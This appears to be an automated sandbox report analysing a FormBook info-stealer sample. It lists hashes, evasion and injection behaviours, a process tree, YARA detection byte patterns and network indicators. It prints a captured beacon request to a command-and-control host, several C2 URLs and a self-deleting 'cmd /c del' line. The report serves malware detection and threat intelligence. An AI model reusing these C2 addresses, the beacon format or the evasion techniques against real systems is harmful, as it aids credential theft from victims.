Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name: BLESSINGS.exe
Analysis ID: 339345
MD5: 30cb872994e8a0a4a635b06bfbe38006
SHA1: 02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256: d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      8.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        8.2.AddInProcess32.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.AddInProcess32.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          8.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: BLESSINGS.exe, Virustotal: Detection: 45%
          Source: BLESSINGS.exe, ReversingLabs: Detection: 15%
          Yara detected FormBook
          Source: Yara match, File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: BLESSINGS.exe, Joe Sandbox ML: detected
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: BLESSINGS.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: BLESSINGS.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exe, Code function: 4x nop then jmp 0117F696h, 1_2_0117EEC2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi, 8_2_00416BF3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi, 8_2_00416C07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi, 8_2_00416C27
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi, 8_2_00416C3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop edi, 8_2_00417D68
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 15_2_001E6BF3
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 15_2_001E6C07
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 15_2_001E6C3F
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 15_2_001E6C27
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 15_2_001E7D68
          Source: global traffic, HTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1 Host: www.quintred.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 91.195.241.137
          Source: Joe Sandbox View, ASN Name: SEDO-ASDE
          Source: unknown, DNS traffic detected: queries for: www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lande
          Source: BLESSINGS.exe, 00000001.00000002.422231496.0000000001180000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exe Binary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
